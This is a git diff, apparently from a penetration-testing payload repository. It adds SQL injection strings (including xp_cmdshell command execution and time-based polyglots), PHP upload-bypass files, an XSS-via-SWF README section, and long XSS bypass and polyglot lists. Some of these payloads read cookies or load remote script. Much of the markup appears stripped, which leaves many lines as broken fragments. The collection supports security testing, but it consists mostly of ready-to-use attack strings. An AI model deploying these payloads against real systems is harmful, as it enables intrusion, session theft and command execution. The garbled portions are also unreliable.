or username like '% +' or uname like '% +' or userid like '% +' or uid like '% +' or user like '% +'; exec master..xp_cmdshell +'; exec xp_regread +t'exec master..xp_cmdshell 'nslookup www.google.com'-- +--sp_password +' UNION SELECT +' UNION ALL SELECT +' or (EXISTS) +' (select top 1 +'||UTL_HTTP.REQUEST +1;SELECT%20* +<>"'%;)(&+ +'%20or%201=1 +'sqlattempt1 +%28 +%29 +%26 +%21 +' or ''=' +' or 3=3 + or 3=3 -- 
diff --git a/SQL injection/Payloads/SQLi_Polyglots.txt b/SQL injection/Payloads/SQLi_Polyglots.txt new file mode 100644 index 0000000..4cc9d80 --- /dev/null +++ b/SQL injection/Payloads/SQLi_Polyglots.txt @@ -0,0 +1,2 @@ +SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ +SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample diff --git a/Template injections/JHADDIX_SSI_Injection.txt b/Template injections/JHADDIX_SSI_Injection.txt new file mode 100644 index 0000000..9b7ba08 --- /dev/null +++ b/Template injections/JHADDIX_SSI_Injection.txt @@ -0,0 +1,75 @@ +
+
 
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/Upload insecure files/Insecure Flash/xssproject.swf b/Upload insecure files/Insecure Flash/xssproject.swf new file mode 100644 index 0000000..a0e7b36 Binary files /dev/null and b/Upload insecure files/Insecure Flash/xssproject.swf differ diff --git a/Upload insecure files/Metadata GIF/phpinfo-metadata.gif b/Upload insecure files/Metadata GIF/phpinfo-metadata.gif new file mode 100644 index 0000000..67f5d45 Binary files /dev/null and b/Upload insecure files/Metadata GIF/phpinfo-metadata.gif differ diff --git a/Upload insecure files/Metadata PNG/phpinfo-metadata.jpg b/Upload insecure files/Metadata PNG/phpinfo-metadata.jpg new file mode 100644 index 0000000..580cf6f Binary files /dev/null and b/Upload insecure files/Metadata PNG/phpinfo-metadata.jpg differ diff --git a/Upload insecure files/PHP Extension/Shell.phpt b/Upload insecure files/PHP Extension/Shell.phpt new file mode 100755 index 0000000..b1abb37 --- /dev/null +++ b/Upload insecure files/PHP Extension/Shell.phpt @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/Upload insecure files/PHP Extension/phpinfo.jpg.php b/Upload insecure files/PHP Extension/phpinfo.jpg.php new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.jpg.php @@ -0,0 +1 @@ + diff --git a/Upload insecure files/PHP Extension/phpinfo.php b/Upload insecure files/PHP Extension/phpinfo.php new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.php @@ -0,0 +1 @@ + diff --git a/Upload insecure files/PHP Extension/phpinfo.php3 b/Upload insecure files/PHP Extension/phpinfo.php3 new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.php3 @@ -0,0 +1 @@ + 
diff --git a/Upload insecure files/PHP Extension/phpinfo.php4 b/Upload insecure files/PHP Extension/phpinfo.php4
new file mode 100644
index 0000000..147cebc
--- /dev/null
+++ b/Upload insecure files/PHP Extension/phpinfo.php4
@@ -0,0 +1 @@
+
diff --git a/Upload insecure files/PHP Extension/phpinfo.php5 b/Upload insecure files/PHP Extension/phpinfo.php5
new file mode 100644
index 0000000..147cebc
--- /dev/null
+++ b/Upload insecure files/PHP Extension/phpinfo.php5
@@ -0,0 +1 @@
+
diff --git a/Upload insecure files/PHP Extension/phpinfo.php7 b/Upload insecure files/PHP Extension/phpinfo.php7
new file mode 100644
index 0000000..147cebc
--- /dev/null
+++ b/Upload insecure files/PHP Extension/phpinfo.php7
@@ -0,0 +1 @@
+
diff --git a/Upload insecure files/PHP Extension/phpinfo.phpt b/Upload insecure files/PHP Extension/phpinfo.phpt
new file mode 100644
index 0000000..147cebc
--- /dev/null
+++ b/Upload insecure files/PHP Extension/phpinfo.phpt
@@ -0,0 +1 @@
+
diff --git a/Upload insecure files/PHP Extension/phpinfo.pht b/Upload insecure files/PHP Extension/phpinfo.pht
new file mode 100644
index 0000000..147cebc
--- /dev/null
+++ b/Upload insecure files/PHP Extension/phpinfo.pht
@@ -0,0 +1 @@
+
diff --git a/Upload insecure files/PHP Extension/phpinfo.phtml b/Upload insecure files/PHP Extension/phpinfo.phtml
new file mode 100644
index 0000000..147cebc
--- /dev/null
+++ b/Upload insecure files/PHP Extension/phpinfo.phtml
@@ -0,0 +1 @@
+
diff --git a/Upload insecure files/README.md b/Upload insecure files/README.md
index 83dbb45..7a8b7d1 100644
--- a/Upload insecure files/README.md
+++ b/Upload insecure files/README.md
@@ -1,5 +1,5 @@ # Upload -Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. +Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. ## Exploits Image Tragik @@ -36,5 +36,20 @@ JPG Bypass a resize - Upload the picture and use a local file inclusion http://localhost/test.php?c=ls ``` +XSS via SWF +``` +As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs. + +This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either. + +Examples: + +Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); + +IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} + +IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); +``` + ## Thanks to -* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil \ No newline at end of file +* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil diff --git a/XSS injection/BRUTELOGIC-XSS-BYPASS-STRINGS.txt b/XSS injection/BRUTELOGIC-XSS-BYPASS-STRINGS.txt new file mode 100644 index 0000000..59dedcd --- /dev/null +++ b/XSS injection/BRUTELOGIC-XSS-BYPASS-STRINGS.txt 
@@ -0,0 +1,17 @@ +alert`1` +alert(1) +alert(1) +alert(1) +(alert)(1) +a=alert,a(1) +[1].find(alert) +top["al"+"ert"](1) +top[/al/.source+/ert/.source](1) +al\u0065rt(1) +top['al\145rt'](1) +top['al\x65rt'](1) +top[8680439..toString(30)](1) +navigator.vibrate(500) +eval(URL.slice(-8))>#alert(1) +eval(location.hash.slice(1)>#alert(1) +innerHTML=location.hash># diff --git a/XSS injection/BRUTELOGIC-XSS-STRINGS.txt b/XSS injection/BRUTELOGIC-XSS-STRINGS.txt new file mode 100644 index 0000000..5ea07a0 --- /dev/null +++ b/XSS injection/BRUTELOGIC-XSS-STRINGS.txt @@ -0,0 +1,113 @@ + +"> +lose focus! +click this! +copy this! +right click this! +copy this! +double click this! +drag this! +focus this! +input here! +press any key! +press any key! +press any key! +click this! +hover this! +hover this! +hover this! +click this! +paste here! + + + + + + + + + +<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); + + + + + + + + + + + + + + + # + # +MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);# +# +%23 + + + + + + + +# +#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); + + +#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); + + +? +"> +
//["'`-->]]>]
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]
&alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]
0? :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
X//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]






...



//["'`-->]]>]
01//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
X//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
¼script ¾alert(19)//¼/script ¾//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
1//["'`-->]]>]
;1//["'`-->]]>]
+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//["'`-->]]>]
//["'`-->]]>]
+
1//["'`-->]]>]
+
]]>]
//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
XXXXXX//["'`-->]]>]
1//["'`-->]]>]
1//["'`-->]]>]
XXX//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
+
+ + + +><image xlink:href="//["'`-->]]>]
+
//["'`-->]]>]
+
  • +
    //["'`-->]]>]
    +
    XXX//["'`-->]]>]
    +
    + + + + +Hello +//["'`-->]]>]
    +
    X//["'`-->]]>]
    XXX
    //["'`-->]]>]
    XXX
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    +
    +//["'`-->]]>]
    +
    //["'`-->]]>]
    //["'`-->]]>]
    alert(57)//0//["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    XXX
    //["'`-->]]>]
    +
    XXX
    //["'`-->]]>]
    + +
    + + + + +//["'`-->]]>]
    + +
    // O10.10↓, OM10.0↓, GC6↓, FF + + // IE6, O10.10↓, OM10.0↓ + // IE6, O11.01↓, OM10.1↓//["'`-->]]>]
    +
    ]>&x;//["'`-->]]>]
    //["'`-->]]>]
    +
    + +//["'`-->]]>]
    + +
    +]>//["'`-->]]>]
    + +
    + XXX +//["'`-->]]>]
    +
    //["'`-->]]>]
    x
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    &x;//["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    +
    //["'`-->]]>]
    +
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    +
    + +//["'`-->]]>]
    + +
    + + + + + + + + + +//["'`-->]]>]
    + +
    + + +//["'`-->]]>]
    + +
    +
    + + + + +
    PRESS ENTER
    //["'`-->]]>]
    + +
    [A] +"> +"> +"> +[B] +"> +[C] + +[D] +<% foo>//["'`-->]]>]
    +
    X
    //["'`-->]]>]
    X
    //["'`-->]]>]
    +
    +alert(94) +//["'`-->]]>]
    + +
    + + + +//["'`-->]]>]
    + +
    +//["'`-->]]>]
    + +
    +
    + + + +
    +//["'`-->]]>]
    + +
    X
    +//["'`-->]]>]
    + +
    XXX//["'`-->]]>]
    +
    //["'`-->]]>]
    XXX//["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    +
    + +//["'`-->]]>]
    +
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    +
    +`><img src=xx:x onerror=alert(108)></a> + + +`><img src=xx:x onerror=alert(2)// +`><img src=xx:x onerror=alert(3)////["'`-->]]>]
    + +
    + + +//["'`-->]]>]
    + +
    + +//["'`-->]]>]
    +
    X
    //["'`-->]]>]
    X
    //["'`-->]]>]
    +
    XXX
    +//["'`-->]]>]
    +
    XXX//["'`-->]]>]
    +
    +//["'`-->]]>]
    + +
    x
    + + +//["'`-->]]>]
    + +
    + +//["'`-->]]>]
    + +
    +

    Drop me

    +
    + +//["'`-->]]>]
    + +
    + +//["'`-->]]>]
    + +
    + + +Spam//["'`-->]]>]
    + +
    + +//["'`-->]]>]
    +
    Some text +www.example.org + + +//["'`-->]]>]
    + +
    // Safari 5.0, Chrome 9, 10 + // Safari 5.0//["'`-->]]>]
    + +
    + +]> + + + + + + + +//["'`-->]]>]
    + +
    +//["'`-->]]>]
    + +
    + +alert(127) +//["'`-->]]>]
    +
    +
    + + +//["'`-->]]>]
    + +
    CLICKME + + + +CLICKME + + +CLICKMEhttp://http://google.com +//["'`-->]]>]
    + +
    drag and drop one of the following strings to the drop box: +

    +jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// +

    +feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// +

    +feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b> +

    +feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// +

    +
    + Drop Box +
    //["'`-->]]>]
    + +
    + + +
    + + + + + + + + + +//["'`-->]]>]
    +
    //["'`-->]]>]
    +
    +<% + +%></xmp><img src=xx:x onerror=alert(134)// + + %>/ +alert(2) + + +XXX + +-->{} +*{color:red}//["'`-->]]>]
    + +
    + + +//["'`-->]]>]
    + +
    + + + + +
    //["'`-->]]>]
    + +
    + + + +//["'`-->]]>]
    +
    //["'`-->]]>]
    + + +
    +
    +
    + + + +exp/* + + + + + +getURL("javascript:alert('XSS')") +a="get"; + + + +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- + + + + +PT SRC="http://ha.ckers.org/xss.js"> diff --git a/XSS injection/Wrapper JS and Data XSS.md b/XSS injection/Wrapper JS and Data XSS.md deleted file mode 100644 index 4e7e3c7..0000000 --- a/XSS injection/Wrapper JS and Data XSS.md +++ /dev/null @@ -1,13 +0,0 @@ -XSS with javascript: -``` -javascript:prompt(1) - -%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341 - -javascript:confirm(1) -``` - -XSS with data: -``` -data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ -``` \ No newline at end of file diff --git a/XSS injection/XSS_Polyglots.txt b/XSS injection/XSS_Polyglots.txt new file mode 100644 index 0000000..21d6f97 --- /dev/null +++ b/XSS injection/XSS_Polyglots.txt @@ -0,0 +1,14 @@ +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> +“ onclick=alert(1)//